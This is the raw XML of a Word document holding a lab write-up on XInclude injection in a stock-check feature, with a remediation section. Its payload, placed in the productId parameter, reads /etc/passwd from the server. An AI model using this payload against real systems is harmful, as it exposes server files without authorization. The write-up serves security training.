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755A90ED" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="00D21553" w:rsidP="00A45757">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D21553">
        <w:t>The lab incorporates a "Check stock" mechanism that places user input inside an XML document server-side. Due to partial control over the XML document, traditional XXE exploitation is not straightforward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827DC3" w14:textId="77777777" w:rsidR="001245CE" w:rsidRPr="001245CE" w:rsidRDefault="001245CE" w:rsidP="00124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45CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As we explore a product page, we click "Check stock". Using Burp Suite, we intercept the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D30C3" w14:textId="2FD75D5C" w:rsidR="0058146F" w:rsidRPr="001245CE" w:rsidRDefault="001245CE" w:rsidP="00F60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245CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The productId parameter is then altered to: &lt;foo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001245CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001245CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="http://www.w3.org/2001/XInclude"&gt;&lt;xi:include parse="text" href="file:///etc/passwd"/&gt;&lt;/foo&gt;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1181107" w14:textId="77777777" w:rsidR="006D38AB" w:rsidRDefault="00A0135C" w:rsidP="006D38A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98A4D0" w14:textId="77777777" w:rsidR="00E02F1B" w:rsidRDefault="00AE4081" w:rsidP="00E02F1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D38AB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;foo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D38AB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D38AB">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>="http://www.w3.org/2001/XInclude"&gt;&lt;xi:include parse="text" href="file:///etc/passwd"/&gt;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230C3054" w14:textId="77777777" w:rsidR="00E02F1B" w:rsidRDefault="00E02F1B" w:rsidP="00E02F1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042E1061" w14:textId="5DC5C1E7" w:rsidR="0029747C" w:rsidRPr="00D02EE9" w:rsidRDefault="00900053" w:rsidP="00D02EE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D38AB">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67490E19" wp14:editId="11937AA1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029200" cy="3940810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="129541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181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47C" w:rsidRPr="00900053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63CCF8D0" w14:textId="124DE9F3" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34809E" w14:textId="77777777" w:rsidR="00456DC7" w:rsidRPr="00456DC7" w:rsidRDefault="00456DC7" w:rsidP="00456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6D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Disable XInclude: </w:t>
      </w:r>
      <w:r w:rsidRPr="00456DC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The XML parser's support for XInclude should be turned off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="4F991ADD" w:rsidR="00595F51" w:rsidRPr="00456DC7" w:rsidRDefault="00456DC7" w:rsidP="001863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56DC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Input Sanitization: </w:t>
      </w:r>
      <w:r w:rsidRPr="00456DC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduce stringent input validation and sanitize XML inputs to prevent malicious directives.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595F51" w:rsidRPr="00456DC7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188D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40CA1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2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1210191738">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="5547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05A2B"/>
    <w:rsid w:val="00050702"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="001245CE"/>
    <w:rsid w:val="001464DE"/>
    <w:rsid w:val="00146D95"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="00172267"/>
    <w:rsid w:val="001D4955"/>
    <w:rsid w:val="0023054A"/>
    <w:rsid w:val="0029747C"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="0030568B"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003B315E"/>
    <w:rsid w:val="003D0738"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="004214CD"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00456DC7"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="0053631B"/>
    <w:rsid w:val="00540A0B"/>
    <w:rsid w:val="0058146F"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="005F5B9D"/>
    <w:rsid w:val="00630668"/>
    <w:rsid w:val="006706BD"/>
    <w:rsid w:val="00676748"/>
    <w:rsid w:val="006D38AB"/>
    <w:rsid w:val="006E1C83"/>
    <w:rsid w:val="006F6440"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="007A48DB"/>
    <w:rsid w:val="007F52EB"/>
    <w:rsid w:val="008061DC"/>
    <w:rsid w:val="00891CB9"/>
    <w:rsid w:val="00900053"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="009F6B4D"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A45143"/>
    <w:rsid w:val="00A45757"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00AE4081"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00B45E18"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00C77580"/>
    <w:rsid w:val="00CA16B0"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00CF7A44"/>
    <w:rsid w:val="00D02EE9"/>
    <w:rsid w:val="00D21553"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E02F1B"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EC3CC6"/>
    <w:rsid w:val="00F14089"/>
    <w:rsid w:val="00F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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T05:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>